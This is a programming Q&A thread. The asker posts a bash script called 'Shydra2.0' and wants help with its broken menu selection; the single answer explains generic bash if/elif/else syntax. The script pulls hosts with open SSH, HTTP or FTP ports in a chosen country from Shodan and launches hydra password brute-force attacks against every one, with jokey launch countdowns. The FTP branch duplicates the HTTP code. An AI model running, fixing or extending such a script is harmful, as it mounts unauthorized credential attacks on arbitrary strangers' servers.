# need to get selections to be implemented further down the script so if 3 do

Tags: linux, bash, shell-script

#!/bin/bash
figlet -w 100 Shydra2.0
echo "shydra2.0 Initializing now"
echo "Please use this responsibly"
echo "I am not responsible for any bad decisions you make"
/bin/sleep 10
#!/bin/bash

echo -en "Make a selection:\n\t1.SSH-Brute\n\t2.HTTP-Brute\n\t3.FTP-Brute\n\tMake Selection:"
read VAR

if [[ $VAR = 1 ]]
then

### original code down##

### asks for API Key for shodan

echo "SSH-Brute Selected"
/bin/sleep 5
echo "Enter Shodan API-Key"
read -p'API:' uservar

echo "Enter 2 letter Country code.....info@https://www.nationsonline.org/oneworld/country_code_list.htm"
read -p'Country Code:' countvar

echo "Enter absolute path to username list ex: /usr/share/wordlists/..etc"
read -p'path to Username list:' ulvar

echo "Enter absolute path to passwordlist ex: /usr/share/wordlists/...etc"
read -p'Password list:' pwvar

echo "SSH-Brute Initializing"
shodan init $uservar

### utilizes shodan search function to find port 22 and greps usable ipaddresses and outputs to file

shodan search Port:22,Country:$countvar | grep -Eo '[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}' > $1 ;
sort $1 | uniq -u > $1

wc -l < $1 && echo "SSH Targets Loaded"

/bin/sleep 5
echo "Targets in Range!"
/bin/sleep 5
echo "Launch Sequence starting soon..."
echo "Abort Now if You're Scared!"

/bin/sleep 5
read -rsn1 -p"Last Chance To abort,Press any key to continue" variable;echo

##countdown function
seconds=10; date1=$((`date +%s` + $seconds));
while [ "$date1" -ge `date +%s` ]; do
echo -ne "$(date -u --date @$(($date1 - `date +%s` )) +%H:%M:%S)\r";
done

##notifiers##
read -rsn1 -p"You know what you signed up for,Press any key to continue" variable;echo
echo "Launching Now"

### hydra command,if not working change absolute paths to username list and password list##

hydra -L $ulvar -P $pwvar -M $1 -o $2 -t 4 ssh
##outputs file to current directory#
echo "File saved in: ${PWD}"
fi

else if [[ $VAR = 2 ]]
then
#http Brute section NEW!

### asks for API Key for shodan

/bin/sleep 5
echo "HTTP-Brute in progress"
/bin/sleep 5
echo "Enter Shodan API-Key"
read -p'API:' uservar
/bin/sleep 5
echo "Enter 2 letter Country code.....info@https://www.nationsonline.org/oneworld/country_code_list.htm"
read -p'Country Code:' countvar

echo "Enter absolute path to username list ex: /usr/share/wordlists/..etc"
read -p'path to Username list:' ulvar

echo "Enter absolute path to passwordlist ex: /usr/share/wordlists/...etc"
read -p'Password list:' pwvar

echo "HTTP Targets Initializing"
shodan init $uservar

### utilizes shodan search function to find port 22 and greps usable ipaddresses and outputs to file

shodan search Port:80,login,Country:$countvar,200 | grep -Eo '[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}' > $1 ;
sort $1 | uniq -u > $1

wc -l < $1 && echo "HTTP Targets Loaded"

/bin/sleep 5
echo "HTTP Targets in Range!"
/bin/sleep 5
echo "Launch Sequence starting soon..."
echo "Abort Now if You're Scared!"

/bin/sleep 10
read -rsn1 -p"Last Chance To abort,Press any key to continue" variable;echo

##countdown function
seconds=10; date1=$((`date +%s` + $seconds));
while [ "$date1" -ge `date +%s` ]; do
echo -ne "$(date -u --date @$(($date1 - `date +%s` )) +%H:%M:%S)\r";
done

##notifiers##
read -rsn1 -p"You know what you signed up for,Press any key to continue" variable;echo
echo "Launching Now"

### hydra command,if not working change absolute paths to username list and password list##

hydra -L $ulvar -vV -P $pwvar http-get-form -M $1 -o $2 -t 4
##outputs file to current directory#
echo "File saved in: ${PWD}"
fi

###FTP FUNCTIONALITY##
else if [[ $VAR = 3 ]]
then
#FTP NEW!

### asks for API Key for shodan

/bin/sleep 5
echo "FTP-Brute in progress"
/bin/sleep 5
echo "Enter Shodan API-Key"
read -p'API:' uservar
/bin/sleep 5                                                                                                                                                            echo "Enter 2 letter Country code.....info@https://www.nationsonline.org/oneworld/country_code_list.htm"
read -p'Country Code:' countvar

echo "Enter absolute path to username list ex: /usr/share/wordlists/..etc"
read -p'path to Username list:' ulvar

echo "Enter absolute path to passwordlist ex: /usr/share/wordlists/...etc"
read -p'Password list:' pwvar

echo "HTTP Targets Initializing"
shodan init $uservar

### utilizes shodan search function to find port 22 and greps usable ipaddresses and outputs to file

shodan search Port:80,login,Country:$countvar,200 | grep -Eo '[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}' > $1 ;
sort $1 | uniq -u > $1

wc -l < $1 && echo "HTTP Targets Loaded"

/bin/sleep 5
echo "HTTP Targets in Range!"
/bin/sleep 5
echo "Launch Sequence starting soon..."
echo "Abort Now if You're Scared!"
/bin/sleep 10
read -rsn1 -p"Last Chance To abort,Press any key to continue" variable;echo

##countdown function
seconds=10; date1=$((`date +%s` + $seconds));
while [ "$date1" -ge `date +%s` ]; do
echo -ne "$(date -u --date @$(($date1 - `date +%s` )) +%H:%M:%S)\r";
done

##notifiers##
read -rsn1 -p"You know what you signed up for,Press any key to continue" variable;echo
echo "Launching Now"

### hydra command,if not working change absolute paths to username list and password list##

hydra -L $ulvar -vV -P $pwvar http-get-form -M $1 -o $2 -t 4
##outputs file to current directory#
echo "File saved in: ${PWD}"
fi

Comment: what's your question? ... do you have a problem of some kind?

Comment: i do, i cannot get selections to then start the section of the script to start.

Comment: So please [edit] your question so that there actually is a clear question when in it. At the moment it's an unformatted dump of code with no context

Answer (score 4):

The basic syntax of an if statement in Bash is:

```
if ...; then
  statement
elif ...; then
  statement
else
  statement
fi
```

As an example:

```
if [ ! "$FOO" ]; then
  echo "Foo is not set."
elif [ "$FOO" = "yes" ]; then
  echo "Foo equals 'yes'."
else
  echo "Foo is set but does not equal 'yes'.";
fi
```

You can leave out the `elif` (else-if) and `else` clauses if you don't need them:

```
if [ "$FOO" = "yes" ]; then
      echo "Foo equals 'yes'."
fi
```

Some people prefer a slightly different format which doesn't use the "; then" at the end of the if clauses:

```
if [ "$FOO" = "yes" ]
then
  echo "Foo equals 'yes'."
fi
```

Comment: The test man page agrees with you, but interesting == works so I didn't catch it.